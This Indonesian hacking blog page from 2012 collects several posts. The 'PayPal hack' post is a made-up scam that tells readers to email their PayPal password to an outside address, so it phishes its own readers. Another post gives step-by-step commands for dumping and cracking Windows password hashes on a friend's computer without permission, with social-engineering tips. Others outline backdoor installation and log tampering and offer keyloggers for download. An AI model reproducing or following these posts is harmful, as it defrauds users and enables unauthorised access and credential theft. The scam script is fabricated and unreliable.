Rabu, 11 Januari 2012

Cara hack paypal

share

Seketat-ketatnya suatu sistem keamanan, tidak ada yang sempurna 100%, masih ada celah-celah yang
bisa kita masuki. seperti paypal, sistem keamanan ketatnya selalu kejar-kejaran dengan para hacker di dunia.
disaat hacker berhasil memasuki database paypal. PayPal memperbaiki sistem keamanannya. setelah itu, hacker kembali mencari celah dan berhasil memasuki databasenya. dan seperti itu seterusnya. sebelum artikel ini di-update, database paypal bisa ditembus dengan string pada URL nya. tapi kini, kesalahan itu sudah diperbaiki. but, masih ada kelemahan paypal buat para hacker untuk menembus database paypal. yaitu, mailerbootnya. jadi begini, saat ini kita memang tidak bisa memasuki database paypal. tapi, kita bisa me-hack mailerboot paypal untuk meminta data-data dari mailerboot paypal. anda tidak perlu menciptakan sendiri code pengconfuse paypal ini. Karena, para hacker-elite sudah menyediakannya untuk anda. silahkan ikuti petunjuk dibawah ini.

Cara mengcrack yang akan diajarkan kepada anda adalah cara mengcrack tingkat tinggi karena disini anda akan diajarkan bahasa pemograman demi mendukung pencurian account paypal ini. tapi, sebelum anda me-hack paypal, pastikan akun paypal anda sudah verified

Metode pengcrackkan ini sangat rahasia dan tidak akan terlacak bila anda mengikuti saran-saran
dan langkah-langkah yang diajarkan dengan benar dan baik. Saya tidak menjamin metode ini berhasil karena, ada kemungkinan Perusahaan paypal telah memperbaiki kelemahan sistemnya.

Baiklah, Kita mulai Saja!

setelah member mendaftar di paypal, maka paypal mengirim e-mail yang meminta membernya untuk memasukkan informasi kartu kredit. Setelah member memasukkan informasi kartu kredit, maka paypal otomatis mengirim kembali informasi-informasi itu ke dalam mailerbot. Dalam kasus ini kita memakai mailerbot berakthru. NAHH!! yang akan kita crack adalah, kita akan membuat "confused" yahoo maillerbot sehingga kita bisa mendapatkan informasi-informasi tentang username/password yang tersimpan di servernya. untuk melakukannya, silahkan ikuti intruksi dan petunjuk-petunjuk berikut:

1.masuklah(log in) ke account paypal anda
2. Klik "street address" yang terletak di bawah "account information"
3. disana anda akan melihat e-mail yang anda masukkan ketika mendaftar paypal. hafalkan alamat e-mail anda tersebut itu. lalu masuk ke e-mail anda yang lain (dalam hal ini, yahoo).
4. oke!!! paypal SAAT INI memiliki 2 mailerbot . yaitu, yahoo dan hotmail
kita mulai dengan anda yang menggunakan yahoo!. masuklah ke e-mail yahoo anda tersebut:


Subjek: indo3534paypal78verif-De24 (untuk membuat bingung yahoo mailerbot)
Kirim : indopaypal@yahoo.com (e-mail paypal Indonesia)
di bagian isi surat. tulis seperti yang dibawah ini. sama persis dan ikuti saran-sarannya.

In line 1: Content-Type: text/plain;
In line 2: charset=us-ascii (Untuk membuat balasan dari paypal bisa dibaca (tidak berbentuk bahasa pemograman))
In line 3: address000%%confirmation0e24.yaIn
In line 4: p38ylec00rm::s%%http://www.paypal.com/%% (untuk membuat mailerbot meminta kembali infomasi dari paypal)
In line 5: e-mail paypal anda(saya meminta anda untuk masuk ke email yahoo anda yang lain adalah agar anda tidak dianggap spam/hacker sehingga tidak ada tanggapan dari paypal. jadi, dengan anda memasukkan email (yang sudah terkonfirmasi ke paypal) maka, anda tidak akan dianggap spam dan hacker. karena, anda telah terdaftar sebagai member paypal. .)
In line 6: start (retrieve > 0) (untuk memfungsikan mailerbot yahoo)
In line 7: verified (*value= = float) (untuk membuat mailerbot berfungsi walau ada proteksi dari paypal)
In line 8: PayPal password anda (sekarang masukkan password paypal anda sehingga anda tidak dianggap spam/hacker, sehingga otomatis mailerbot akan mengirim informasi-informasi user lainnya ke e-mail paypal anda dengan valid..)
In line 9: #searchmsgend%EcHvld%%hr# (untuk mendapatkan informasi-informasi user Secara acak)
In line 10: send&&idR20394-tsa-0583 (membuat mailerbot mengirimkan semua informasi-informasinya ke e-mail anda)
In line 11: #endofmsg (langkah terakhir)
in line 12: #IP=#136.112.213:8080# = value(untuk mengubah IP address anda demi keamanan anda)

Nb: Jangan merubah sedikitpun scrpt diatas, atau tidak akan bekerja. dan hapuslah tulisan "line 1...12" 

Setelah anda mengirim e-mail tersebut.. tunggu beberapa menit dan periksa e-mail anda. 

Hack Windows XP (SP2) Passwords

share

Apakah anda pernah menggunakan komputer di Lab atau pinjam komputer teman atau bahkan menggunakan komputer di tempat umum? Nah, biasanya klo di Lab (berdasarkan pengalaman pribadi) komputer pasti di-password dan jika ingin masuk harus tanya dulu ke sang empunya. Nah, sekarang kita dapat melihat password dari komputer yang kita gunakan tanpa merestart komputer atau pun tanpa menginstall program apapun seperti Cain, L0pthCrack, dsb. Hanya dibutuhkan sedikit ‘kepercayaan’ untuk meminjam komputer (istilah kerennya social engineering) dan 2 buah program, yaitu pwdump6 dan john the ripper. Tapi klo kebetulan ada login umum dengan tipe administrator, itu namanya Hoki! ga perlu cape2 pinjam login teman lagi :-D .
Sebelumnya mungkin anda pernah mendapatkan tutorial mengenai cara menge-hack password user yang ada Windows XP atau NT menggunakan pwdump. Yup, mungkin tutorial ini akan mirip dengan bagaimana cara menge-hack Windows XP, terutama Windows XP SP2. Lalu apa bedanya dengan tutorial yang lain? Saat ini Windows XP SP2 (atau mungkin juga SP1, CMIIW), menggunakan Syskey untuk memproteksi agar HASH (tempat menyimpan password yang dienkripsi) tidak dapat dibaca dan didumpmenggunakan pwdump atau samdump. Untuk lebih jelasnya berikut penjelasan mengenai Syskey [1] :
Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. The main purpose of this feature is to deter ‘offline’ attack. In fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good password crackers to “recover” the passwords; of course physical access is almost always required. So with syskey the attacker needs to remove the additional encryption layer to get the password hashes.
Jika dulu mungkin di Windows NT atau XP (sebelum SP2), kita masih bisa menggunakan pwdump atau bahkan langsung dengan KaHT, maka untuk Windows XP SP2 cara tersebut tidak dapat digunakan lagi (mungkin lebih tepatnya, pwdump tersebut tidak dapat digunakan lagi). Nah disinilah letak perbedaan dengan tutorial sebelumnya. Jika sebelumnya kita menggunakan pwdump versi lama, maka sekarang digunakanpwdump6 yang dikembangkan oleh fizzgig and the foofus.net Team. Kalau baca README dari pwdump6 ini, maka pwdump6 adalah :
pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.
A significantly modified version of pwdump3e, this program is able to extract NTLM and LanMan hashes from a Windows target, regardless ofwhether Syskey is turned on. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file
Oh iya, agar pwdumpd6 dapat dijalankan dan mendapatkan HASH file dibutuhkan account yang mempunyai akses setara dengan Administrator. Nah, oleh karena itu kita harus menjalankan sedikit social engineering. Bilang aja ketemen kita, klo mengakses workgroup, tapi ga bisa klo pake login biasa. Tapi tenang aja, biasanya secara default orang-orang kebanyakan mebuat user dengan tipe account Administrator. Atau gunakan berbagai macam cara, daya, upaya maupun rayuan agar kita bisa dapat login terlebih dulu.
Jika udah punya akses dengan login tipe adiministrator, cara selanjutnya adalah tinggal menjalankan pwdump6. Jika anda punya flashdisk, simpan dan bawa terus pwdump6 ini kemanapun ada pergi, siapa tahu berguna suatu saat.. :-D . Ok, langsung aja kita jalankan pwdump6 ini. Sebaiknya copy dulu pwdump6 ke Hardisk (jangan dijalankan dari flashdik). Sebelumnya downlod dulu pwdump6 ini dari sini atau download dari mirror situs saya disini.
1. Jalankan CMD (Run->cmd)
2. Jalankan pwdump6 seperti berikut (misalnya PwDump6 berada di folder D:\PwDump6)
D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1
pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net
This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.
Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.
3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi. Contohnya akan tampak seperti berikut :
ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::
4. Yosh!! password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.
Download John The Ripper untuk Windows disini. Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :
D:\john171w\john1701\run>john-mmx.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)
Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.
Administrator:1+Administrator:2 = adminkeren123
Sedangkan untuk user “coba” adalah “mudahditebak”!!
Mudah bukan? Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.
Nah, sekarang kalau kita mau pakai komputer teman di Lab, ga usah cari2 orangnnya lagi. Tinggal pake aja langsung user Admin lagi, tapi jangan sampai ketahuan ama dia….. :-D Atau klo anda lupa password Administrator, tidak perlu mereboot komputer, lalu mereset password anda. Tinggal ikut langkah2 diatas aja!
Referensi :
[1]. http://studenti.unina.it/~ncuomo/syskey
Thanks to fizzgig for you great tools, pwdump6 (http://www.foofus.net/fizzgig/pwdump)! I’ve been looking for this tools for a log time ago! Thanks dude!! and Thanks to pen-test@securityfocus.com!
Update : Cara yang lebih mudah dapat ditemukan di Hack Windows XP Password dengan Ophcrack :-D 

Belajar Hack Yuck! (1) – Konsep Dasar Hacking

share

Intro
Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamathttp://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.
Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.


Bagian 1
*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ‘standar’, hacking sebenarnya tidak harus selalu sesuai dengan ‘standar’ ini.

Hacking buat pemula
- by aCh
Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….
Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….
Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.
Pro dan Kontra Hacking
Pro
Kontra
Etika Hacking
Semua informasi adalah free
Jika semua informasi adalah free, maka tidak ada ladi privacy
Aspek Security
Intrusion adalah ilustrasi kelemahan sistem
Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci
Idle Machines
Hacking hanya pada idle machines
idle machines milik siapa ?
science education
hanya membobol tapi tidak merusak
“hacker wannabe” berpotensi sangat besar untuk merusak
Okeh, sekarang waktunya melakukan aksi…

1. Fase Persiapan
~ Mengumpulkan informasi sebanyak-banyaknya
– Secara Aktif : – portscanning
– network mapping
– OS Detection
– application fingerprinting
Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat
– Secara Pasif : – mailing-list (jasakom, newbie_hacker, hackelink, dsb)
– via internet registries (informasi domain, IP Addres)
– Website yang menjadi terget

2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.orgmilw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->
$gcc -o exploit exploit.c
$./exploit
# hostname (# tanda mendapatkan akses root)
remote host -> $gcc -o exploit exploit.c
$./exploit -t www.target.com
# (klo beruntung mendapatkan akes root)
~ Brute Force
– Secara berulang melakukan percobaan otentifikasi.
– Menebak username dan password.
– Cracking password file
~ Social Engineering
– Memperdayai user untuk memeberi tahu Username dan password
– Intinya ngibulin user….

3. Fase Setelah Eksekusi
~ Menginstall backdoor, trojans, dan rootkit
~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin
~ Menyalin /etc/passwd atau /etc/shadow/passwd
Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!

Referensi :
-Hacking and Defense, Jim Geovedi, negative@magnesium.net
-Network Defense, Jim Geovedi, negative@magnesium.net

Minggu, 08 Januari 2012

AnonPlus, Jejaring Sosial Versi Hacker

share

AnonPlus, Jejaring Sosial Versi Hacker – AnonPlus, Jejaring Sosial Versi Hacker – Google dilaporkan telah memblokir anggota kelompok hacker Anonymous dari situs jejaring sosialGoogle+. Atas pemblokiran tersebut, kelompok hacker tersebut malah membuat situs jejaring sosial versi mereka sendiri yang bernama AnonPlus.
Seperti yang dikutip dari TechSpot, Senin (18/7/2011), Situs yang beralamatkan di www.anonplus.com tersebut saat ini hanya baru diumumkan. Tertulis di situs tersebut ‘Revision: 0.1 Alpha’ yang menandakan bahwa situs tersebut masih dalam tahap awal pengembangan, belum menjadi situs jejaring sosial sepenuhnya. Yang baru ada di situs tersebut hanyalah tulisan ‘Social Networking Anonymously‘ dan header yang bertuliskan ‘Welcome to AnonPlus.com, the Anonymous Social Networking site‘.
674607 AnonPlus, Jejaring Sosial Versi Hacker
Jejaring sosial ini tidak akan mentolerir tindakan pemblokiran, sensor, atau penindasan,” tulis perwakilan pihak Anonymous dalam pernyataannya.
Kami, masyarakat, telah jenuh atas pernyataan pemerintah dan korporat, yang mengatakan apa yang terbaik ataupun aman untuk kita. Era penindasan sudah berakhir. Internet bukan lagi sebuah penjara bagi kita,” tambahnya.
Satu-satunya link yang ada di situs tersebut adalah Dev Forum, yang menggunakan software forum Zetaboards, dan tidak dibawah nama domain anonplus.com. Ada empat subforum di Zetaboards, yaitu The LogicThe InterfaceGeneral Chatter, dan Staff Positions. Di saat penulisan, tercatat sudah ada 100 anggota yang terdaftar di situs AnonPlus.
AnonPlus mungkin tidak akan mendorong penggunanya untuk membagikan nama serta lokasi mereka. Tujuan dibuatnya situs jejaring sosial oleh Anonymous mungkin agar pengguna bisa melakukan apapun yang mereka suka di sana.

Daftar Situs Hacker Indonesia dan Luar Negeri

share

Daftar Situs Hacker Indonesia dan Luar Negeri – Berikut ini adalah list daftar situs hacker Indonesia / daftar situs hacking Indonesia / daftar web hacker Indonesia / daftar web hacking Indonesia / daftar website hacker indonesia / daftar website hacking Indonesia / daftar situs cracker Indonesia / daftar situs cracking Indonesia / daftar web cracker Indonesia / daftar web cracking Indonesia / daftar website cracker indonesia / daftar website cracking Indonesia.
Berikut adalah List Situs Hacker Indonesia:
  1. www.binushacker.net
  2. www.jasakom.com
  3. www.echo.or.id
  4. www.kecoak.org
  5. www.devilzc0de.org
  6. www.spyrozone.net
  7. www.yogyacarderlink.web.id
  8. www.nyit-nyit.net
  9. www.indonesianhacker.or.id
  10. www.muslimhacker.net
  11. www.sekuritionline.net
  12. www.exploit-id.com
  13. www.surabayahackerlink.org
  14. www.xcode.or.id
  15. www.hacker-newbie.org
Berikut ini adalah daftar website hacker luar negeri / List site hacker / list site hacking / list web hacker / list web hacking / list website hacker / list website hacking / list site cracker / list site cracking / list web cracker / list web cracking / list website cracker / list website cracking around the world.
Tambahan List Situs Hacker Luar Negeri:
  1. www.packetstormsecurity.org
  2. www.phrack.org
  3. www.blackhat.com
  4. www.hackforums.net
  5. www.hackinthebox.org
  6. www.securityxploded.com
  7. www.hackaday.com
  8. www.darknet.org.uk
  9. www.securiteam.com
  10. www.seclist.org
  11. www.metasploit.com
  12. www.backtrack-linux.org
  13. www.secmaniac.com
  14. www.irongeek.com
  15. www.hak5.org
Sebenernya masih banyak lagi yang lainnya, cuman ya cukup sampai situ aja ya listnya. Yang lain bisa dicari sendiri referensinya icon smile Daftar Situs Hacker Indonesia dan Luar Negeri
Semoga bermanfaat, selamat menimba ilmu..

Hacker Indonesia Hmei7 Kembali Bobol Enam Situs Siemens

share

LENSAINDONESIA.COM: Seorang hacker Indonesia yang memiliki nick Hmei7 kembali beraksi. Setelah sebelumnya membobol situs milik Microsoft dan IBM, kini Hmei7 melakukan hal serupa pada enam situs milik Siemens.Situs-situs tersebut berasal dari Ekuador, Peru, Venezuela, Kolombia, dan Brazil.

Seperti dikutip dari HackingZones, dalam prosesnya, hacker tersebut menampilkan sebuah pesan dan gambar seorang gelandangan yang sedang mengutak-atik laptop sebagai tampilan di situs-situs tersebut. Namun tak lama berselang, dua situs yang berasal dari Brazil sudah berhasil dipulihkan.

Sontak kejadian ini menjadi hal yang memalukan bagi Siemens. Sebelumnya pihak perusahaan mengatakan akan memperbaiki jaringan keamanan miliknya pada Januari 2012. Namun seorang peneliti keamanan bernama Billy Rios mengatakan bahwa pihaknya sudah memberitahu Siemens mengenai kerentanan keamanan situs Siemens sejak Mei 2011

Israel Gagal Temukan Hacker Pembobol Kartu Kredit 45 Ribu Warganya

share

REPUBLIKA.CO.ID, TEL AVIV - Setelah sebelumnya seorang mahasiswa Israel gembar-gembor telah menemukan identitas hacker yang membobol informasi pribadi puluhan ribu pengguna kartu kredit Israel, hacker Saudi yang mengklaim sebagai pembobol asli mengatakan bahwa Israel mendapat orang yang salah.

"Tidak ada yang akan menangkap saya, itu tidak mungkin," hacker yang dikenal dengan nama "0xOmar" seperti dilansir Ynet Israel yang mendapat pernyataan itu lewat email.

"Jika seorang mahasiswa bodoh berpikir ia dapat menemukan saya dalam delapan jam, apa yang akan Mossad lakukan?" Kata hacker tersebut dalam email.

Ynet sebelumnya, Jumat (6/1) melaporkan bahwa seorang ahli komputer Israel mengklaim telah menemukan identitas sebenarnya dari "0xOmar", yaitu seorang pelayan 19 tahun, orang Meksiko biasa disebut Habib Umar. Pelaku diduga berbasis di Meksiko dan bukan di Arab Saudi.

"Saya ingin merusak finansial dan sosial Israel," katanya. 0xOmar bersumpah mengirim file lebih dan lebih banyak lagi lewat emailnya. Ia juga menambahkan bahwa ia berasal dari Riyadh, bukan Meksiko. Dia juga mengatakan dengan tegas bahwa target berikutnya adalah kontraktor militer dan sistem SCADA (Supervisory Control dan Data Acquisition) Israel, demikian Ynet melaporkan

"Tidak mungkin untuk melacak saya via email atau Facebook atau sesuatu seperti itu. Sata seorang hacker canggih yang tahu segala sesuatu tentang internet, saya tahu sangat baik bagaimana menyembunyikan diri, kata" 0xOmar "lagi dalam emailnya.

Radio publik Israel sebelumnya mengatakan Jumat(6/1), bahwa hacker Saudi menyerang lagi dengan file Internet baru yang mengandung virus Trojan.

Menurut laporan tersebut, peretas itu memposting rincian kartu kredit, tetapi ada malware serius yang dapat merusak pengguna yang mengunduh data tersebut.

"Database ini berisi 60.000 data kartu kredit baik pemilik kartu MasterCard dan Visa, tapi aku akan mengirimkan kepada mereka nanti," katanya, Ia juga mengaku telah membobol data dari perusahaan-perusahaan kontraktor militer Israel.

Yoram HaCohen, keadilan Senior pelayanan resmi, mengatakan kepada radio militer, tidak begitu khawatir tentang kartu kredit itu sendiri karena bisa dibatalkan. Tapi ia mencemaskan tentang informasi pribadi yang sudah diserang seperti alamat email, password dan nomor kartu ID . "katanya.

Yoram mengaku akan sulit untuk melacak hacker tersebut, karena mereka mengambil tindakan pencegahan yang baik. Ia juga mengatakan Israel akan melibatkan Interpol.

Jadi Hacker Tidak Perlu Pintar

share

Zaman dulu, hacker identik dengan pecandu komputer yang suka begadang sampai pagi, coba berbagai cara untuk mencari kelemahan keamanan sebuah sistem. Stereotipe ini mungkin akan jadi karakter di film saja karena untuk menembus lubang keamanan, cukup sedia beberapa ratus dolar saja.
Anda tidak perlu belajar bertahun-tahun tentang TCP/IP, server side scripting atau cara kerja jaringan untuk melakukan infeksi terhadap komputer seeseorang. Cukup sediakan $700 dan beli satu skrip bernama Mpack, maka semua tugas itu akan dilakukannya. Bayangkan, bulan juni lalu 80,000 website dikerjain oleh kode-kode yang berhubungan dengan Mpack. Dalam satu serangan. Dan tentu, tidak diperlukan keahlian teknis untuk mengoperasikannya. Anda cukup tahu di mana membelinya.
Program ini juga menawarkan update secara regular, guna mengetahui kebocoran-kebocoran program yang terbaru. Menurut Paul Henry dari Secure Computing, jumlah perangkat hacking yang didownload meningkat hingga lebih dari 68,000 download. Program-program seperti Mpack, Shark2, Nuclear, Web Attacker dan IcePack dapat dibeli, sehingga memberi fasilitas kepada siapa saja yang membutuhkan. Anak-anak, jangan mencoba ini di rumah!
Bagaimana mengamankan situs web Anda dari Mpack? Meskipun beberapa perusahaan antivirus sedang bekerja keras untuk riset kelakuan Mpack ini, tapi tentu pembuatnya juga melakukan riset untuk mencari cara yang lain. Berikut beberapa tips sederhana untuk mengurangi resiko Mpack.
  • Mpack dapat menjalankan exploitnya jika Anda belum melakukan update (patch), jadi pastikan program Anda memperoleh upgrade keamanan secara reguler.
  • Sebagian besar aplikasi akan melakukan update secara otomatis jika Anda mengijinkannya. Pastikan ini semua berjalan.
  • Ganti secara reguler password Anda. Hindari menginstal aplikasi web pada folder default, dan tentu saja, update aplikasi Anda dengan versi terakhir.
  • Coba layanan yang melaporkan jika ada perubahan terhadap website Anda (seperti changenotes.com). Kalau sempat, cek rutin setiap hari jika ada trafik yang berlebihan di web Anda.
http://netsains.com/2007/09/jadi-hacker-tidak-perlu-pintar/

Koleksi 63 Keylogger Pilihan

share

 Koleksi 63 Keylogger Pilihan web desain grafisBagi para lamerz maniak hacking tools pasti sering mendengar keylogger. :D. Apa sih keylogger ? Keylogger merupakan tools yang pada dasarnya memiliki sebuah fungsi untuk melakukan monitoring semua akitivitas yang dilakukan oleh user pada sebuah PC. Mulai dari merekam password yang diketikan, chatting di instant messaging, program apa saja yang dijalankan oleh user, apa yang dilakukan user pada program tersebut, dan semua yang diketikkan di keyboard hingga pergerakan mouse, bahkan beberapa keylogger yang telah lama beredar mengincludekan fasilitas pengcapture layar monitor setiap 5 menit sekali, dan outputnya adalah HTML.
Ada beberapa keylogger yang cukup menarik, diantaranya ada yang dapat mengirim hasil dari monitoring aktivitas tersebut ke email sang penanam keylogger tersebut. Sehingga si penanam keylogger tersebut dapat melihat semua aktivitas yang dilakukan oleh user pada sebuah pc melalui email.
Jelas keylogger ini bersifat kontroversial seperti 2 mata pisau, positif, negatif, membangun dan menghancurkan. Tidak cukup waktu untuk mendiskusikan semua hal tersebut.
Untuk menambah koleksi hacking tools anda, :D silahkan unduh 63 keylogger terbaru? yang cukup handal …
Berikut daftarnya : 
1. 007 Keylogger Spy Software 3.873
2. Active Key Logger 2.4
3. Activity Keylogger 1.80.21
4. Activity Logger 3.7.2132
5. ActMon Computer Monitoring 5.20
6. Actual Spy 2.8
7. Advanced Invisible Keylogger v1.9
8. Advanced Keylogger 1.8
9. Ardamax Keylogger 2.9
10. BlazingTools Perfect Keylogger 1.68
11. Blazingtools Remote Logger v2.3
12. Data Doctor KeyLogger Advance v3.0.1.5
13. Local Keylogger Pro 3.1
14. ExploreAnywhere Keylogger Pro 1.7.8
15. Family Cyber Alert 4.06
16. Family Keylogger 2.80
17. Firewall bypass Keylogger 1.5
18. Free Keylogger 2.53
19. Ghost Keylogger 3.80
20. Golden Eye 4.5
21. Golden KeyLogger 1.32
22. Handy Keylogger 3.24 build 032
23. Home Keylogger 1.77
24. Inside Keylogger 4.1
25. iOpus Starr PC and Internet Monitor 3.23
26. iSpyNow v2.0
27. KeyScrambler 1.3.2
28. Keystroke Spy 1.10
29. KGB Keylogger 4.2
30. KGB Spy 3.84
31. LastBit Absolute Key Logger 2.5.283
32. Metakodix Stealth Keylogger 1.1.0
33. Network Event Viewer v6.0.0.42
34. OverSpy v2.5
35. PC Activity Monitor Professional 7.6.3
36. PC Spy Keylogger 2.3 build 0313
37. PC Weasel 2.5
38. Personal PC Spy v1.9.5
39. Power Spy 6.10
40. Powered Keylogger v2.2.1.1920
41. Quick Keylogger 2.1
42. Radar 1.0
43. Real Spy Monitor 2.80
44. Real Spy Monitor 2.80
45. Remote Desktop Spy 4.04
46. Remote KeyLogger 1.0.1
47. Revealer Keylogger Free 1.33
48. SC Keylogger Pro 3.2
49. Smart Keystroke Recorder Pro
50. Spector Pro 6.0.1201
51. SpyAnytime PC Spy 2.42
52. SpyBuddy 3.7.5
53. Spytech SpyAgent 6.02.07
54. Spytector 1.3.5
55 Stealth Key Logger 4.5
56. System keylogger 2.0.0
57. Tim?s Keylogger 1.0
58. Tiny Keylogger 2.0
59. Total Spy 2.7
60. Windows Keylogger 5.04
61. Win-Spy Pro 8.9.109
62. XP Advanced Keylogger 2.5
63. XPCSpy Pro version 3.01
